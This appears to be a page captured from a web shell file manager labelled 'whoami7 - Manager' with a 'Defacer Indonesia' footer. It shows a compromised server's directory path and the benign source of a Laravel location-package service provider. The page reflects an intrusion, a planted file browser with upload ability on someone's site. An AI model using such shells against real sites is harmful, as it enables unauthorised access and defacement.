whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
stevebauman
/
location
/
src
/
Upload File:
files >> //home/kckglobal/www/portal/vendor/stevebauman/location/src/LocationServiceProvider.php
<?php namespace Stevebauman\Location; use Illuminate\Support\ServiceProvider; use Stevebauman\Location\Commands\Update; class LocationServiceProvider extends ServiceProvider { /** * Bootstrap the service provider. */ public function boot(): void { $this->mergeConfigFrom( $config = __DIR__.'/../config/location.php', 'location' ); if ($this->app->runningInConsole()) { $this->publishes([$config => config_path('location.php')]); } $this->commands(Update::class); } /** * Register bindings in the service container. */ public function register(): void { $this->app->singleton(LocationManager::class); } }
Copyright ©2021 || Defacer Indonesia